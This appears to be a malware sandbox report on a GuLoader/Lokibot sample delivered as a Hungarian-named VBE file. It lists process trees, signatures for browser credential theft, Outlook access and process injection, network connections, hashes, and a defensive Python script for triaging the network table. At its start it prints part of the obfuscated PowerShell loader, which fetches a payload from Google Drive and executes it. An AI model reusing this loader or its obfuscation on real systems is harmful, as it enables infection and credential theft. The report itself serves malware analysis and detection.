lodt.Enami0Recur;Unrob Miz aWObl viMucednSilki6 Syre4Count;Fi ma ,eskxUdlej6Stnin4Catac;Perso Di.nfrUndisvSundh:Highh1U ion2Asy e1Tingh.Carra0Appr )Pikan .etsmGUdsaveMoistcForovk liosoForar/Unmil2Unpre0 ba a1Still0Swoon0T lre1Slage0 Ekse1 Aug ,utaFSubheiBr.ebrcholteHospif UartoKry,rxCofa /t kis1Nonpe2 bast1Intre. 
land0 vden ';$Ostealgia=Germania ' AlecUopt.gsNonseeTruckRglott- udieAOveraGRead EFeyesn D,miTRec l ';$Aerosiderolite=Germania 'FoundhLnpost Tehatart.rp be hsHeadr:Fem r/Hyper/Varmed ildr EnetiDrv yvK proeTrito.Ciss gMllesoMan eoTwop g HypolWieraeRegne.brndbcraakooLy phmDeuto/ReturuGispecF odh?KoloneGre.nxInfrepFuldaoLse rrZoophtBensk=BekosdUn onoSammewEctronVavasl AssuoFlageaArbejdnonme&R gioireassdPlanc=Pendl1SplenhEmbas3Ar owUKa.acp ildLDaareFforkmJBackwEPat lzAr ejo MelgG tinsrEsophSOrg,nvP rhaQSynsvRShiveqko stZUnderD egnf5 KvadMRedniUStudeuDyrenGreparb GonodA,cur3ArbouS Sa.tZ revaGPriviVAkkumSDupli ';$Datamaskinelles=Germania ' arce>melle ';$Remans=Germania 'RiddeIOutuseSu.erXGenti ';$Transmits='Dani';$Helhesten147 = Germania 'Me hjeRainfc Varih KoleoDupli Adels%EnthuaTrimnpTr.lnp.arvedTro ra.nwout Ciroa Perp% Il p\ EuctRHeraco Perob Enklo,jaltr otaa R,dgtUndereBivir.skat,UAutoinAn ihs Sprn Arbor&Salme&Water KanoneAlgaec.epiahHfligo lori Ass,ctBullb ';Talekanalen (Germania 'C eck$A damgTartel NutroMarnab ,upeaRanchlBnh e: YderGomstbaUnirrlEtn ge rrepnFaktoiSektetHelafeAl issRacem6,ispe9Ugand=Immes(S pplcT.kmlmSm ltdFored Beco,/Susp cMa hi Bumse$FastiH k lteSoapmlOpsonh.ilfleBasonsHy ektInco.eBes fnHns.r1Forge4Parmi7Sidia) Adon ');Talekanalen (Germania 'undko$RomavgFrag l RecaoLikv bEnchaaArbe.lKra,e:.tateOChevyufalsttSkrivsC mbup Par,aCratonGallesdiscr=Super$ UsikAGeodteOd.nsr Ant.oCribbsSpooniVirtudChicoekollerveksloUd,ollSlidsiHeltitLympheLyng . Ob us trep Cardlfuldbi L vetLaic,(Snegl$Un erD.odesaE.doctKropsaEnmarmRefraaHjlp sU.malkMetafi SrinnAcrobeTr.djl TraplImmoreUddansDemar)B lli ');Talekanalen (Germania 'Toned[SatinN ravmeOldfatPosth.DemokSF edaeIldskrFlyvevFrag.iR bidcViolieS.rapPDelegoMesmeiTrngsn ivertDy epMRepolaBemoun.amilaDummygCissoePanadrSp in]rdlig:Gavst:Hk.enSUnfeleBlegdcHalvfuE.orbrStartiSq,artTaktfy ubisPUnimirChrysojubustrem uoHippocPara oCosmolSyndi ecur=pu.le Spe c[ Imp NSol ie HebdtLetfa. 
CounSEgomaeUrinic RetsuYmperrProz iTe,mitAdapty PneuPOphidr T deo ArtetBill o tedfcPara o Forsl AnthTFo giy Consp Kn teS esk] Spin:Land :OutsoTCompalKropesMetap1Clyde2Disc ');$Aerosiderolite=$Outspans[0];$Superhistorical= (Germania 'Ge,yt$StorrgSvinelA.matO HypobSl.taA indl rif:N.ndiRSupraEGe,eiUD,fectDaaseI An elAscriiJ.ylesRembuI BagsNMalicgTripa=BirdsN Ops.E CintWMisco-T ombO NrinBVammeJnanniE CapacAmbleTAtten BjrkesTautoy ritcsSkilltFamoue wungm Vulv.Part.n LangeFleett Ydel. b.dwwKnfale PladBTryllC SideLSign I Kamme.pasmNUnr,pt');$Superhistorical+=$Galenites69[1];Talekanalen ($Superhistorical);Talekanalen (Germania 'Ch,et$forktRSlimmeDe.tsu EnketReobsiChlorl rocriDekorsUrethiDecyln Brang Stip. SprjHKatteeElemhaGuilfdBru ee SoverRew dsModfo[Kniks$ edraOBand skberntStatse nrasa ForblSo,acgMyrrhiLudolaBolth]Ove,b=Cryst$AntisDMaggieOpstnr c ramMultioVerdir PreyeEre oa ippecFunkttWindoiTrus.oUs.ornC,rne ');$Innest=Germania 'Desmo$ProviRDe igeAnisbuAdjutt Kar iBib,ilBadg.iNrsynsOrgani SekunPretagRe zi.OverdD.uftfoL kalwmanihn AsfmlMatrioJordba Hyald KosmF,lathi NonilBegree Ridg( part$barnaAM.sabeHorserP pilo Klges BrseiSke ldU aeneBarserTeleooDel,glSan,tiNavnltko mae Espa,Unath$ ErinMHampeeVegstrSekstoEf ulpRaadmi SupeaCompusHolla),ruta ';$Meropias=$Galenites69[0];Talekanalen (Germania 'He.mi$OverbGStikllEnligOso erBFeti,aP,efoLUefte:kulsoPSpknilKugleeSuperCPr sit Del,R .imaE Spor=Borup(MadagTMe,iaeEye oSGuldaTUefte-AnkomPAr,olANonentE helhSnob Rid,e$Dechem Ul,reN,rmaRIdnhkOFrostPFinjuiDenizABe iasSu,ps)Straf ');while (!$Plectre) {Talekanalen (Germania 'Cockn$ Ind.g OrielOd ntoSemi,bVr.ihaUnderl onna:HimmeBSensaoMalobrtrgretuntorlDim noFibrod etad L akeSuperrMet p=fr mk$FilostDisplrDupwaubyggeePhala ') ;Talekanalen $Innest;Talekanalen (Germania 'SyzygSFl.rttFu hia entrrSjlfutKopie-Ca vaSCivi l ,cieeIodo.eRingvpTredv Virre4Forud ');Talekanalen (Germania 'Fremt$StiktgPr aclKattioHydribUbehaaFrnnelClino: SkipPByguelTropieBrn,ec DiabtShemir Cavee 
Hand=Abiet(AmbolTSabl.eRehidsVov htAmmod-For rPMyofiaPiotetU neahSnegl Puff $SplinMJawtwe AntirFr vloSpitepatt niCo.ntaGlottsU ork)Skip ') ;Talekanalen (Germania 'Aphod$HoboigCy,tol Almbo.ekatbre teaS okklKnowi:SlaaeFskjoreBas.bcReferuGlgninBa bldPamp,aSkumgtGligaiGr skoSterlnVulpe= S or$phallgu clol Chono IndibRvesaaPussll Bevi: Sv tVCircue ortsr nodb ytmia UngalPol.iiDermazFrysee Feus+Fitti+Staff% .orm$ In,aO Vagtu DgndtSljens,rfabpHandsaTaut.nSt lds Rels.BackrcSkorpoLsgnguSe imn onktSpeci ') ;$Aerosiderolite=$Outspans[$Fecundation];}$Afskumningernes=320006;$Fragtraterne=29409;Talekanalen (Germania ' Endo$ VrksgFabullWetcho Its b Opt.aAmarylEksku:.kikkv.ndryaPedalaSnurpbPentae Ta.inFiffis KompmCalamuCul eg Telel dmugirigsanAt ragmi ros Ness Samp=Bevir NonsGAgoraeDublet eks-forsiCtineioDr ukn .glitMa cae ilbanVejentQuara Gedeh$ParocM CocheFinkmrQidnooSmertpLalpai UncaaOu,grsStrsk ');Talekanalen (Germania 'Glaum$VendigCreatl.oddeoMrk,pbBeaanaMentalWobl :SteriDBor ojForbivBilfoethermlskralsDo nwk,ncomeIn stsDe re Af.an=Shoes Kabin[LimfaS SavkyLaborsBatiktDetoneriddlmudp r.Eq iaCP ehaoSp ldnErganv Drape Cicar orldtPsi,o]Adj d:Jus i:AstraFUnvisrRe ieoBorgemReserBFirmaaStedesofficePref,6Impr,4Ma orSNonsutBarchrNyhediLnpronPossig elfr(humid$ t anvRe,isa TimoaPontibBorgeeVagtsnIntersRammemsmkreu,phthgGlyoxlFunktiAlsi.nP.ocegRecapsstruk)Adun ');Talekanalen (Germania 'Ragin$autofgPrecolKukstoSor ib C noa ollalPhosp:J.ledDAspiryScourrAlde,t ,yppi Videdsherie forhrOktaenVred eKron. 
Tildr=Prewr tachy[ dersSBararySe,resCatalt barheDaginmAra,a.Ha,roThalvaeClusixEn ydtConst.FyldeE Beh.nSu pacRaadioRugmedPantei,amblnU rangSvlge]Cor o:barse:AnecdABam uSpile COutbrIGreg,Iberve.V skeGBlowge PagitDdsfoSplacitNettor MyeliUndernOv rcgepemb(polys$Spo vDDea ljBrillvEvil e ParalkatjasMakrokInd ae Equas,esth)U der ');Talekanalen (Germania 'Bedst$BanjogAntislSk ifoSkovsbNeonsaUdgralAfskr:sw shI brennCoexitInspie ForbgNoteauNabofmBedyreGentanBortdtmrklaaAlrunlUndk,=Ta tr$MiscoDBjergySalinr ajortEjakui allid Bl,fetidsbrStentn N tae Anti. ompasAvelluAccombunfa.sRea rtGas.rr BelgiBestrnAsshog Scan( U,in$SlrinASu laf Li osSubvekLurdau a admNeissn Ov,riVigtenF gesgViolieUnscrr KontnBoysrean mas Om u, .ank$ Ro.tFLjpesrFasteaTilb,gSkakbtSuperrvil yaskrmmt,venee CamprfolkenTegnieunneu)Unren ');Talekanalen $Integumental;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Roborate.Uns && echo t"

C:\Program Files (x86)\windows mail\wabmig.exe

"C:\Program Files (x86)\windows mail\wabmig.exe"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | drive.google.com | udp
GB | 142.250.179.238:443 | drive.google.com | tcp
US | 8.8.8.8:53 | drive.usercontent.google.com | udp
GB | 142.250.187.225:443 | drive.usercontent.google.com | tcp
GB | 142.250.179.238:443 | drive.google.com | tcp
US | 8.8.8.8:53 | c.pki.goog | udp
GB | 142.250.187.227:80 | c.pki.goog | tcp
US | 8.8.8.8:53 | o.pki.goog | udp
GB | 142.250.187.227:80 | o.pki.goog | tcp
GB | 142.250.187.225:443 | drive.usercontent.google.com | tcp
NL | 104.248.205.66:80 | | tcp
NL | 104.248.205.66:80 | | tcp
NL | 104.248.205.66:80 | | tcp
NL | 104.248.205.66:80 | | tcp
NL | 104.248.205.66:80 | | tcp
NL | 104.248.205.66:80 | | tcp

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WL6M4674514FHTGVWI6D.temp

MD5 cd49698584111bebc88fd5f9dea6106b
SHA1 8ccad272e75c516ddff0e95646843f8072200d94
SHA256 820f65a74c63a689adbce512aa166057551f9170a1fe4cbff1d78ab5b3086732
SHA512 10b501b2bd317acbd03bfcc4940e68516ed586ffd781bc3f9dc576be84daf7fe8c070eea04b75bdfb4daf9d18fe6cf9f5c99cd3264212339ed94225f714fba60

C:\Users\Admin\AppData\Roaming\Roborate.Uns

MD5 0b4940908143e7fa3180389a9b914557
SHA1 50985967f0dd7d2d8fdac35c66e6c066aba58aaf
SHA256 6e7664ac02af1fef33611b5150c64e285ca5c5bfda5bd555299c6df7b41f4d22
SHA512 eae1f4f22060ae85a31013cf9b904429e914018188eb519135e9ee747ff35b6a6426f665cd61cfb8724908658d11e80deb483901f4357c10cb5d207cb352e299

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2872745919-2748461613-2989606286-1000\0f5007522459c86e95ffcc62f32308f1_4d69f9e1-559c-46cf-82ac-67913db47c55

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2872745919-2748461613-2989606286-1000\0f5007522459c86e95ffcc62f32308f1_4d69f9e1-559c-46cf-82ac-67913db47c55

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-17 11:01

Reported

2024-09-17 11:03

Platform

win10v2004-20240802-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\A beérkezett kérelem visszaigazolása.vbe"

Signatures

Guloader,Cloudeye

downloader guloader

Lokibot

trojan spyware stealer lokibot

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4776 set thread context of 3664 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4952 wrote to memory of 4976 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4952 wrote to memory of 4976 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 1948 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4976 wrote to memory of 1948 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4976 wrote to memory of 100 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4976 wrote to memory of 100 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 100 wrote to memory of 4776 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 100 wrote to memory of 4776 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 100 wrote to memory of 4776 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4776 wrote to memory of 1084 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4776 wrote to memory of 1084 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4776 wrote to memory of 1084 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4776 wrote to memory of 3664 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 4776 wrote to memory of 3664 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 4776 wrote to memory of 3664 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 4776 wrote to memory of 3664 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 4776 wrote to memory of 3664 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\A beérkezett kérelem visszaigazolása.vbe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Roborate.Uns && echo t"

C:\Windows\system32\cmd.exe

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Roborate.Uns && echo t"

C:\Program Files (x86)\windows mail\wabmig.exe

"C:\Program Files (x86)\windows mail\wabmig.exe"

Network

Country  Destination          Domain                         Proto
US       8.8.8.8:53           drive.google.com               udp
US       8.8.8.8:53           25.140.123.92.in-addr.arpa     udp
US       8.8.8.8:53           154.239.44.20.in-addr.arpa     udp
GB       142.250.179.238:443  drive.google.com               tcp
US       8.8.8.8:53           drive.usercontent.google.com   udp
GB       142.250.187.225:443  drive.usercontent.google.com   tcp
US       8.8.8.8:53           238.179.250.142.in-addr.arpa   udp
US       8.8.8.8:53           22.160.190.20.in-addr.arpa     udp
US       8.8.8.8:53           225.187.250.142.in-addr.arpa   udp
US       8.8.8.8:53           217.106.137.52.in-addr.arpa    udp
US       8.8.8.8:53           196.249.167.52.in-addr.arpa    udp
GB       142.250.179.238:443  drive.google.com               tcp
US       8.8.8.8:53           c.pki.goog                     udp
GB       142.250.187.227:80   c.pki.goog                     tcp
US       8.8.8.8:53           o.pki.goog                     udp
GB       142.250.187.227:80   o.pki.goog                     tcp
US       8.8.8.8:53           227.187.250.142.in-addr.arpa   udp
GB       142.250.187.225:443  drive.usercontent.google.com   tcp
US       8.8.8.8:53           86.23.85.13.in-addr.arpa       udp
US       8.8.8.8:53           206.23.85.13.in-addr.arpa      udp
NL       104.248.205.66:80    -                              tcp
US       8.8.8.8:53           172.214.232.199.in-addr.arpa   udp
NL       104.248.205.66:80    -                              tcp
NL       104.248.205.66:80    -                              tcp
US       8.8.8.8:53           19.229.111.52.in-addr.arpa     udp
NL       104.248.205.66:80    -                              tcp
NL       104.248.205.66:80    -                              tcp
NL       104.248.205.66:80    -                              tcp

"-" in the Domain column marks a connection opened directly to an IP address, with no name lookup for it in the capture.
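The table mixes sandbox and OS noise (resolver traffic to 8.8.8.8, PTR lookups, certificate status checks) with the two things worth extracting as indicators: the legitimate hosting service used for delivery and the repeated bare-IP HTTP connections that never had a name lookup. The triage script below is an added example, not part of the report; the rows are copied from the table (with "-" where it shows no domain), and the category names and rules are ours.

```python
# Added example, not part of the report: triage of the behavioral Network table.
# Rows are copied from the table; a "-" (or a missing field) in the Domain
# column means the connection went straight to an IP address. The category
# names and the rules that assign them are ours, not the sandbox's.

from collections import Counter

NETWORK_ROWS = """\
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.187.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 225.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
GB 142.250.187.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
NL 104.248.205.66:80 - tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
NL 104.248.205.66:80 - tcp
NL 104.248.205.66:80 - tcp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
NL 104.248.205.66:80 - tcp
NL 104.248.205.66:80 - tcp
NL 104.248.205.66:80 - tcp
"""


def parse_rows(text: str) -> list[dict]:
    """Parse 'Country Destination [Domain] Proto' rows; no domain -> None."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if not fields:
            continue
        if len(fields) == 4:
            country, dest, domain, proto = fields
            if domain == "-":
                domain = None
        else:  # three fields: the Domain column is simply absent
            country, dest, proto = fields
            domain = None
        rows.append({"country": country, "dest": dest, "domain": domain, "proto": proto})
    return rows


def classify(row: dict) -> str:
    """Assign one triage category to a row (rule order matters)."""
    domain = row["domain"] or ""
    if row["proto"] == "udp" and row["dest"].endswith(":53"):
        # Resolver traffic: PTR lookups are the sandbox/OS reverse-resolving
        # peers, forward lookups tell us which names the sample asked for.
        return "dns-ptr" if domain.endswith(".in-addr.arpa") else "dns-query"
    if domain.endswith("pki.goog"):
        return "cert-validation"  # CRL/OCSP fetches for Google's TLS chain
    if domain.endswith("google.com"):
        return "hosting-service"  # delivery via a legitimate hosting service
    if row["domain"] is None:
        return "direct-ip"  # no name resolution seen for this endpoint
    return "other"


def summarize(text: str = NETWORK_ROWS) -> dict:
    """Category counts plus the two indicator lists an analyst would keep."""
    rows = parse_rows(text)
    cats = [classify(r) for r in rows]
    return {
        "counts": dict(Counter(cats)),
        "hosting_hosts": sorted({r["domain"] for r, c in zip(rows, cats) if c == "hosting-service"}),
        "direct_ip_endpoints": sorted({r["dest"] for r, c in zip(rows, cats) if c == "direct-ip"}),
    }


if __name__ == "__main__":
    for key, value in summarize().items():
        print(f"{key}: {value}")
```

Six TCP connections to 104.248.205.66:80 with no lookup for that address is the pattern to take forward as the candidate C2 indicator; the drive.google.com and drive.usercontent.google.com fetches are the "Legitimate hosting services abused for malware hosting/C2" signature from the summary and are only useful as indicators together with the specific URL the sample requested, which this table does not record.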

Files

memory/4976-0-0x00007FFA6BAC3000-0x00007FFA6BAC5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_idfk0znx.px4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4976-3-0x000002B71FF80000-0x000002B71FFA2000-memory.dmp

memory/4976-11-0x00007FFA6BAC0000-0x00007FFA6C581000-memory.dmp

memory/4976-12-0x00007FFA6BAC0000-0x00007FFA6C581000-memory.dmp

memory/4976-14-0x00007FFA6BAC3000-0x00007FFA6BAC5000-memory.dmp

memory/4976-16-0x00007FFA6BAC0000-0x00007FFA6C581000-memory.dmp

memory/4976-17-0x00007FFA6BAC0000-0x00007FFA6C581000-memory.dmp

memory/4776-18-0x0000000002F80000-0x0000000002FB6000-memory.dmp

memory/4776-19-0x00000000059B0000-0x0000000005FD8000-memory.dmp

memory/4776-20-0x00000000058C0000-0x00000000058E2000-memory.dmp

memory/4776-21-0x0000000005FE0000-0x0000000006046000-memory.dmp

memory/4776-22-0x0000000006050000-0x00000000060B6000-memory.dmp

memory/4776-32-0x0000000006140000-0x0000000006494000-memory.dmp

memory/4776-33-0x00000000067A0000-0x00000000067BE000-memory.dmp

memory/4776-34-0x00000000067E0000-0x000000000682C000-memory.dmp

memory/4776-35-0x0000000007FB0000-0x000000000862A000-memory.dmp

memory/4776-36-0x0000000006D50000-0x0000000006D6A000-memory.dmp

memory/4776-37-0x0000000007A20000-0x0000000007AB6000-memory.dmp

memory/4776-38-0x00000000079D0000-0x00000000079F2000-memory.dmp

memory/4776-39-0x0000000008BE0000-0x0000000009184000-memory.dmp

C:\Users\Admin\AppData\Roaming\Roborate.Uns

MD5 0b4940908143e7fa3180389a9b914557
SHA1 50985967f0dd7d2d8fdac35c66e6c066aba58aaf
SHA256 6e7664ac02af1fef33611b5150c64e285ca5c5bfda5bd555299c6df7b41f4d22
SHA512 eae1f4f22060ae85a31013cf9b904429e914018188eb519135e9ee747ff35b6a6426f665cd61cfb8724908658d11e80deb483901f4357c10cb5d207cb352e299

memory/4776-41-0x0000000009190000-0x000000000C536000-memory.dmp

memory/4976-42-0x00007FFA6BAC0000-0x00007FFA6C581000-memory.dmp

memory/3664-43-0x0000000000D00000-0x00000000040A6000-memory.dmp

memory/3664-57-0x0000000000D00000-0x00000000040A6000-memory.dmp

memory/4976-60-0x00007FFA6BAC0000-0x00007FFA6C581000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-656926755-4116854191-210765258-1000\0f5007522459c86e95ffcc62f32308f1_6f95b8b4-c02b-43c9-8cd4-016780936b63

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-656926755-4116854191-210765258-1000\0f5007522459c86e95ffcc62f32308f1_6f95b8b4-c02b-43c9-8cd4-016780936b63

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61